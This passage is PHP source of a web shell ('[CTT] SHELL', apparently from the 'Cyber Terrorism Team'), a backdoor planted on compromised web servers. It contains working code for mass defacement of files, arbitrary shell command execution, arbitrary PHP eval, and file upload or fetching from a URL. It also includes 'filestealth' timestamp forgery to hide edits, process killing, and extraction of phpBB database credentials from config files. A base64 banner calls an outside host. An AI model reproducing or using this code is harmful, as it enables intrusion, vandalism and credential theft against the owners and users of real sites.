    "; + if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.

    ";} + echo " +Deface for (file/directory name):   - regexp +
    Deface in (explode \";\"): +

    Search text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +
    - PREVIEW AFFECTED FILES +

    Html of deface:
    +

    "; + if ($act == "ls") {echo "
    Deface took ".$defacetime." secs

    ";} +} +if ($act == "search") +{ + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $a = array + ( +"name"=>$search_name, "name_regexp"=>$search_name_regexp, +"text"=>$search_text, "text_regexp"=>$search_text_regxp, +"text_wwo"=>$search_text_wwo, +"text_cs"=>$search_text_cs, +"text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) + { +ctfsearch($v); + } + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { +$ls_arr = $found; +$disp_fullpath = true; +$act = $dspact = "ls"; + } + } + echo "
    + +Search for (file/directory name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {echo "
    Search took ".$searchtime." secs

    ";} +} +if ($act == "chmod") +{ + $perms = fileperms($d.$f); + if (!$perms) {echo "Can't get current mode.";} + elseif ($submit) + { + if (!isset($owner[0])) {$owner[0] = 0;} + if (!isset($owner[1])) {$owner[1] = 0; } + if (!isset($owner[2])) {$owner[2] = 0;} + if (!isset($group[0])) {$group[0] = 0;} + if (!isset($group[1])) {$group[1] = 0;} + if (!isset($group[2])) {$group[2] = 0;} + if (!isset($world[0])) {$world[0] = 0;} + if (!isset($world[1])) {$world[1] = 0;} + if (!isset($world[2])) {$world[2] = 0;} + $sum_owner = $owner[0] + $owner[1] + $owner[2]; + $sum_group = $group[0] + $group[1] + $group[2]; + $sum_world = $world[0] + $world[1] + $world[2]; + $sum_chmod = "0".$sum_owner.$sum_group.$sum_world; + $ret = @chmod($d.$f, $sum_chmod); + if ($ret) {$act = "ls";} + else {echo "Èçìåíåíèå Àòðèáóò Ôàéëà (".$d.$f."): Îøèáêà
    ";} + } + else + { + echo "
    Èçìåíåíèå Àòðèáóò Ôàéëà
    "; + $perms = view_perms(fileperms($d.$f)); + $length = strlen($perms); + $owner_r = $owner_w = $owner_x = + $group_r = $group_w = $group_x = + $world_r = $world_w = $group_x = ""; + + if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";} + if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";} + if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";} + if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";} + if ($perms[9] == "x") {$world_x = " checked";} + echo "
    + + +
    + +
    Owner

    +Read
    Write
    +Execute
    Group

    +Read
    +Write
    +Execute
    World

    Read
    +Write
    +Execute
    "; + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\","/",$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile[tmp_name])) + { +if (empty($uploadfilename)) {$destin = $uploadfile[name];} +else {$destin = $userfilename;} +if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Îøèáêà, çàãðóæàþùàÿ ôàéë ".$uploadfile[name]." (íå ìîæåò ñêîïèðîâàòü \"".$uploadfile[tmp_name]."\" íà \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { +if (!empty($uploadfilename)) {$destin = $uploadfilename;} +else +{ + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} +} +if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} +else +{ + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Íå ìîæåò çàãðóçèòü ôàéë!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Îøèáêà, ïèøóùàÿ ôàéëó ".htmlspecialchars($destin)."!
    ";} + else + { +fwrite($fp,$content,strlen($content)); +fclose($fp); +if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } +} + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "Çàãðóçêà Ôàéëà:
    ".$uploadmess."
    +Ëîêàëüíûé ôàéë:

                   èëè
    +Çàãðóçèòü èç URL:


    +Ñîõðàíèòü ýòîò ôàéëü â ïàïêó:


    +Èìÿ Ôàéëà:
    + Êîíâåðòèðîâàòü èìÿ ôàéëà

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($v)."
    ";} + if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;} + } + $act = "ls"; +} +if ($act == "onedelete") +{ + $delerr = ""; + $result = false; + $result = fs_rmobj($f); + if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."
    ";} + if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;} + $act = "ls"; +} +if ($act == "onedeleted") +{ + $delerr = ""; + $result = false; + $result = fs_rmobj($d+'/'+$f); + if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."
    ";} + if (!empty($delerr)) {echo "Óäàëåíèå ñ îøèáêàìè:
    ".$delerr;} + $act = "ls"; +} +if ($act == "deface") +{ + $deferr = ""; + foreach ($actbox as $v) + { + $data = $deface_html; + if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);} + $data = str_replace("%%%filename%%%",basename($v),$data); + $data = str_replace("%%%filepath%%%",$v,$data); + $fp = @fopen($v,"w"); + fwrite($fp,$data); + fclose($fp); + if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."
    ";} + if (!empty($delerr)) {echo "Defacing with errors:
    ".$deferr;} + } +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";} + if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";} + if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";} + + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèðîâàòü ".$v." to ".$to."!
    ";} +if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåðåìåñòèòüñÿ ".$v." to ".$to."!
    ";} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($psterr)) {echo "Ïðèêëåèâàíèå ñ îøèáêàìè:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + + if ($ext == ".tar.gz") + { +$cmdline = "tar cfzv"; + } + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { +$v = str_replace("\\","/",$v); +if (is_dir($v)) +{ + if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} + $v .= "*"; +} +$cmdline .= " ".$v; + } + $ret = `$cmdline`; + if (empty($ret)) {$arcerr .= "Íå ìîæåò íàçâàòü archivator!
    ";} + $ret = str_replace("\r\n","\n"); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { +if (in_array($v,$ret)) {fs_rmobj($v);} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèðîâàòü ".$v." to ".$to."!
    ";} +if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåðåìåñòèòüñÿ ".$v." to ".$to."!
    ";} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($psterr)) {echo "Ïðèêëåèâàíèå ñ îøèáêàìè:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { +while ($o = readdir($h)) {$list[] = $d.$o;} +closedir($h); + } + } + if (count($list) == 0) {echo "
    Íå ìîæåò îòêðûòü ñïðàâî÷íèê (".htmlspecialchars($d).")!
    ";} + else + { + $tab = array(); + $amount = count($ld)+count($lf); + $vd = "f"; + if ($vd == "f") + { +$row = array(); +$row[] = "
    Èìÿ"; +$row[] = "
    Ðàçìåð
    "; +$row[] = "
    Èçìåíåí
    "; +if (!$win) + {$row[] = "
    Âëàäåëåö/Ãðóïïà
    ";} +$row[] = "
    Ïðàâà
    "; +$row[] = "
    Ôóíêöèè
    "; + +$k = $sort[0]; +if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} +if (empty($sort[1])) {$sort[1] = "d";} +if ($sort[1] != "a") +{ + $y = "
    "; +} +else +{ + $y = ""; +} + +$row[$k] .= $y; +for($i=0;$i".$row[$i]."";} +} + +$tab = array(); +$tab[cols] = array($row); +$tab[head] = array(); +$tab[dirs] = array(); +$tab[links] = array(); +$tab[files] = array(); + +foreach ($list as $v) +{ + $o = basename($v); + $dir = dirname($v); + + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + + $row = array(); + +if (is_dir($v)) + { + if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";} + else {$type = "DIR";} + $row[] = "   ".$disppath.""; + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "  ".$disppath.""; + $row[] = view_size(filesize($v)); + } + $row[] = "
    ".date("d.m.Y H:i:s",filemtime($v))."
    "; + + if (!$win) + { + $ow = @posix_getpwuid(fileowner($v)); + $gr = @posix_getgrgid(filegroup($v)); + $row[] = "
    ".$ow["name"]."/".$gr["name"]."
    "; + } + + if (is_writable($v)) {$row[] = "".view_perms(fileperms($v))."";} + else {$row[] = "".view_perms(fileperms($v))."";} + + if (is_dir($v)) {$row[] = "  ";} + else {$row[] = "    ";} + + if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} + elseif (is_link($v)) {$tab[links][] = $row;} + elseif (is_dir($v)) {$tab[dirs][] = $row;} + elseif (is_file($v)) {$tab[files][] = $row;} +} + } + $v = $sort[0]; + function tabsort($a, $b) + { +global $v; +return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v])); + } + usort($tab[dirs], "tabsort"); + usort($tab[files], "tabsort"); + if ($sort[1] == "a") + { +$tab[dirs] = array_reverse($tab[dirs]); +$tab[files] = array_reverse($tab[files]); + } + $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]); + echo " +"; +$smsn=0; + foreach($table as $row) + { +$smsn++; + if ($smsn!=2 && $smsn!=3) { +echo "\r\n"; +foreach($row as $v) {echo "\r\n";} +echo "\r\n"; +} + + } + echo "
    ".$v."
    + + +
    +Ïàïêè: ".(count($tab[dirs])+count($tab[links]))." Ôàéëû: ".count($tab[files]).""; +if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { +echo "                   "; + } + echo " "; + echo ""; + +echo "
    "; +echo "

    [CTT] SHELL ver ".$shver."
    "; + } + +} +if ($act == "cmd") +{ + if (!empty($submit)) + { + echo "Ðåçóëüòàò âûïîëíåíèÿ ýòà êîìàíäà:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { +ob_clean(); +myshellexec($cmd); +$ret = ob_get_contents(); +$ret = convert_cyr_string($ret,"d","w"); +ob_clean(); +echo $tmp; +if ($cmd_txt) +{ + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; +} +else {echo $ret;} + } + else + { +if ($cmd_txt) +{ + echo "
    "; +} +else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Êîìàíäà âûïîëíåíèÿ:"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "


    "; +} +if ($act == "ps_aux") +{ + echo "Ïðîöåññû:
    "; + if ($win) { +echo "
    ";
    +system('tasklist');
    +echo "
    "; +} + else + { + if ($pid) + { +if (!$sig) {$sig = 9;} +echo "Sending signal ".$sig." to #".$pid."... "; +$ret = posix_kill($pid,$sig); +if ($ret) {echo "ok. he is dead, amen.";} +else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "Can't execute \"ps -aux\"!";} + else + { +$ret = htmlspecialchars($ret); +$ret = str_replace(""," ",$ret); +while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} +$prcs = explode("\n",$ret); +$head = explode(" ",$prcs[0]); +$head[] = "ACTION"; +unset($prcs[0]); +echo ""; +echo ""; +foreach ($head as $v) {echo "";} +echo ""; +foreach ($prcs as $line) +{ + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "KILL"; + foreach ($line as $v) {echo "";} + echo ""; + } +} +echo "
       ".$v."   
       ".$v."   
    "; + } + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Ðåçóëüòàò âûïîëíåíèÿ ýòîò PHP-êîä:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { +ob_clean(); +eval($eval); +$ret = ob_get_contents(); +$ret = convert_cyr_string($ret,"d","w"); +ob_clean(); +echo $tmp; +if ($eval_txt) +{ + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; +} +else {echo $ret;} + } + else + { +if ($eval_txt) +{ + echo "
    "; +} +else {echo $ret;} + } + @chdir($olddir); + } + else {echo "PHP-êîä âûïîëíåíèÿ"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "


    "; +} +if ($act == "f") +{ + $r = @file_get_contents($d.$f); + if (!is_readable($d.$f) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) + { +if (in_array($ext,$v)) {$rft = $k; break;} + } + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + + echo "Ðàññìîòðåíèå ôàéëà:     ".$f." (".view_size(filesize($d.$f)).")      "; + if (is_writable($d.$f)) {echo "Ïîëíûé äîñòóï ÷òåíèÿ/çàïèñè (".view_perms(fileperms($d.$f)).")";} + else {echo "Read-Only (".view_perms(fileperms($d.$f)).")";} + + echo "
    "; + if ($ft == "info") + { +echo "Information:"; +echo ""; +echo ""; +echo ""; +if (!$win) +{ + echo ""; +echo ""; +echo ""; +echo ""; +echo "
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $tmp=posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." "; + $tmp=posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; +} +echo "
    Perms"; + +if (is_writable($d.$f)) +{ + echo "".view_perms(fileperms($d.$f)).""; +} +else +{ + echo "".view_perms(fileperms($d.$f)).""; +} + +echo "
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + + +$fi = fopen($d.$f,"rb"); +if ($fi) +{ + if ($fullhexdump) + { + echo "FULL HEXDUMP"; + $str=fread($fi,filesize($d.$f)); + } + else + { + echo "HEXDUMP PREVIEW"; + $str=fread($fi,$hexdump_lines*$hexdump_rows); + } + $n=0; + $a0="00000000
    "; + $a1=""; + $a2=""; + for ($i=0; $i";} +$a1.="
    "; +$a2.="
    "; + } + } + echo "
    $a0". +"$a1$a2

    "; +} +$encoded = ""; +if ($base64 == 1) +{ + echo "Base64 Encode
    "; + $encoded = base64_encode($r); +} +elseif($base64 == 2) +{ + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode($r)); +} +elseif($base64 == 3) +{ + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode($r); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); +} +elseif($base64 == 4) +{ +} +if (!empty($encoded)) +{ + echo "

    "; +} +echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { +if ($white) {@ob_clean();} +echo $r; +if ($white) {exit;} + } + elseif ($ft == "txt") + { +echo "

    ".htmlspecialchars($r)."
    "; + } + elseif ($ft == "ini") + { +echo "
    ";
    +var_dump(parse_ini_file($d.$f,true));
    +echo "
    "; + } + elseif ($ft == "phpsess") + { +echo "
    ";
    +$v = explode("|",$r);
    +echo $v[0]."
    "; +var_dump(unserialize($v[1])); +echo "
    "; + } + elseif ($ft == "exe") + { +echo "
     
    "; + } + elseif ($ft == "sdb") + { +echo "
    ";
    +var_dump(unserialize(base64_decode($r)));
    +echo "
    "; + } + elseif ($ft == "code") + { +if (ereg("phpBB 2.(.*) auto-generated config file",$r)) +{ + $arr = explode(" +",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";} + echo "Parameters for manual connect:
    "; + $cfgvars = array( + "dbms"=>$dbms, + "dbhost"=>$dbhost, + "dbname"=>$dbname, + "dbuser"=>$dbuser, + "dbpasswd"=>$dbpasswd + ); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + + echo "
    "; + echo "
    "; + } +} +echo "
    "; +if (!empty($white)) {@ob_clean();} +if ($rehtml) {$r = rehtmlspecialchars($r);} +$r = stripslashes($r); +$strip = false; +if(!strpos($r,""; $r = trim($r); $strip = true;} +$r = @highlight_string($r, TRUE); +if ($delspace) {$buffer = str_replace (" ", " ", $r);} +echo $r; +if (!empty($white)) {exit;} +echo "
    "; + } + elseif ($ft == "download") + { +@ob_clean(); +header("Content-type: ctshell"); +header("Content-disposition: attachment; filename=\"".$f."\";"); +echo($r); +exit; + } + elseif ($ft == "notepad") + { +@ob_clean(); +header("Content-type: text/plain"); +header("Content-disposition: attachment; filename=\"".$f.".txt\";"); +echo($r); +exit; + } + elseif ($ft == "img") + { +if (!$white) +{ + echo "
    "; +} +else +{ + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: image/gif"); + echo($r); + exit; +} + } + elseif ($ft == "edit") + { +if (!empty($submit)) +{ + if ($filestealth) {$stat = stat($d.$f);} + if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Ñîõðàí¸íü!!!"; + fwrite($fp,$nfcontent); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $nfcontent; + } +} +$rows = count(explode(" +",$r)); +if ($rows < 10) {$rows = 10;} +if ($rows > 30) {$rows = 30;} +echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +if ($act == "phpinfo") +{ + ob_end_clean(); + phpinfo(); + exit; +} +} +$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4="); +if ($act == "img") +{ + @ob_clean(); + + $arrimg = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe". +"Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9". +"W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7", +"edit"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> 